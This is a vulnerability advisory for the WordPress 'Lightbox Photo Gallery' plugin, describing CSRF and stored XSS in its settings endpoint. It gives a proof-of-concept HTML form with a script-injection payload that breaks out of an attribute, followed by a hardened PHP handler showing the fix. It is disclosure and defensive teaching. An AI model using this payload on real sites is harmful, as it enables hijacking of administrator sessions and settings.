Title: WordPress 'Lightbox Photo Gallery' plugin - CSRF/XSS
Version: 1.0
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2014/12/12
Download: https://wordpress.org/plugins/lightbox-photo-gallery/
Notified WordPress: 2014/11/27
----------------------------------------------------------------

## Description: 
----------------------------------------------------------------
Lightbox Photo Gallery will help you quickly and easily create an appealing photo gallery that opens in a lightbox. Use the settings page to select the images you want in your gallery and add the shortcode [ll-gallery] to the page or post where you want the gallery to show.

## CSRF:
----------------------------------------------------------------
It is possible to change the plugin's admin settings by tricking a logged-in administrator into visiting a crafted page. The `ll_save_settings` request to admin-ajax.php is accepted without a nonce or any other request-origin check (the PoC form under Stored XSS below carries none), so a third-party page can submit it with the victim's session cookies.


## Stored XSS:
----------------------------------------------------------------
Settings data submitted from the admin page are stored unsanitized and echoed back on the plugin's admin page without output escaping. An attacker who can submit the settings form, directly or through the CSRF above, can therefore store JavaScript that executes in the browser of every administrator who opens the plugin's settings page.

PoC:
Log in as admin and then submit the following form (replace [DOMAIN] with the target host). The `&quot;>` prefix of the payload closes the double-quoted `value="..."` attribute in which the stored URL is later echoed, and the `<script>` tag that follows runs when the settings page is rendered.
	<form method="POST" action="http://[DOMAIN]/wp-admin/admin-ajax.php">
		<input type="text" name="action" value="ll_save_settings"><br />
		<input type="text" name="ll__opt[image2_url]" value="http://www.smartcatdesign.net/wp-content/uploads/demo_banner.png&quot;><script>alert(document.cookie);</script>"><br />
		<input type="text" name="ll__opt[image3_url]" value="http://www.smartcatdesign.net/wp-content/uploads/demo_banner.png&quot;><script>alert(document.cookie);</script>"><br />
		<input type="text" name="ll__opt[background_color]" value="#ffffff"><br />
		<input type="text" name="ll__opt[disable]" value="1"><br />
		<input type="submit">
	</form>
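For reference, the handler pattern that removes both issues (the CSRF and the stored XSS) in a WordPress AJAX settings endpoint, as an added example. This is not the Lightbox Photo Gallery plugin's code, which this advisory does not reproduce; the option name `ll__opt`, the action name `ll_save_settings` and the field names are taken from the PoC form above, while the function names and the `manage_options` capability are assumptions for the illustration.

```php
<?php
// Added illustration of a hardened settings handler; not the plugin's own code.
// Hypothetical assumptions: settings are kept in the 'll__opt' option, the AJAX
// action is 'll_save_settings', and the settings page is rendered by the second
// function below. Field names follow the advisory's PoC form.

// Register for logged-in users only (no wp_ajax_nopriv_ hook), so anonymous
// requests never reach the handler at all.
add_action( 'wp_ajax_ll_save_settings', 'll_save_settings_hardened' );

function ll_save_settings_hardened() {
    // CSRF: require a nonce bound to this action. A cross-site form cannot read
    // the nonce out of the admin page, so check_ajax_referer() dies with -1 and
    // HTTP 403 before any setting is touched.
    check_ajax_referer( 'll_save_settings', '_ajax_nonce' );

    // Authorization: being logged in is not sufficient; require the capability
    // the settings page itself is gated on.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    $in  = ( isset( $_POST['ll__opt'] ) && is_array( $_POST['ll__opt'] ) ) ? wp_unslash( $_POST['ll__opt'] ) : array();
    $out = array();

    // Stored XSS, input side: accept only known fields and coerce each to its type.
    // esc_url_raw() keeps only a well-formed URL with an allowed scheme, so the
    // '"><script>' tail from the PoC does not survive storage.
    foreach ( array( 'image2_url', 'image3_url' ) as $field ) {
        $out[ $field ] = isset( $in[ $field ] ) ? esc_url_raw( $in[ $field ] ) : '';
    }
    // Hex colour: a strict pattern match instead of trusting the submitted string.
    $color = isset( $in['background_color'] ) ? trim( $in['background_color'] ) : '';
    $out['background_color'] = preg_match( '/^#[0-9a-fA-F]{6}$/', $color ) ? $color : '#ffffff';
    $out['disable'] = empty( $in['disable'] ) ? 0 : 1;

    update_option( 'll__opt', $out );
    wp_send_json_success( $out );
}

// Settings page: emit the nonce the handler expects, and escape every stored
// value on output. Output escaping is the second, independent line of defence
// in case a value ever reaches the option by another path.
function ll_render_settings_page_hardened() {
    $opt = get_option( 'll__opt', array() );
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-ajax.php' ) ); ?>">
        <?php wp_nonce_field( 'll_save_settings', '_ajax_nonce' ); ?>
        <input type="hidden" name="action" value="ll_save_settings">
        <?php foreach ( array( 'image2_url', 'image3_url' ) as $field ) : ?>
            <input type="text" name="ll__opt[<?php echo esc_attr( $field ); ?>]"
                   value="<?php echo esc_attr( isset( $opt[ $field ] ) ? $opt[ $field ] : '' ); ?>">
        <?php endforeach; ?>
        <input type="text" name="ll__opt[background_color]"
               value="<?php echo esc_attr( isset( $opt['background_color'] ) ? $opt['background_color'] : '#ffffff' ); ?>">
        <input type="checkbox" name="ll__opt[disable]" value="1" <?php checked( ! empty( $opt['disable'] ) ); ?>>
        <input type="submit" value="Save">
    </form>
    <?php
}
```

With this in place, the PoC form above fails at `check_ajax_referer()` (no nonce), and even a request that does carry a valid nonce cannot store the `"><script>` payload because `esc_url_raw()` rejects it on the way in and `esc_attr()` neutralises anything that does get stored on the way out.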


## Solution
----------------------------------------------------------------
No fixed version is available at the time of writing.

WordPress.org has been notified and the plugin has been closed (removed from the directory) until it is updated. Sites running it should deactivate the plugin until a fixed release appears.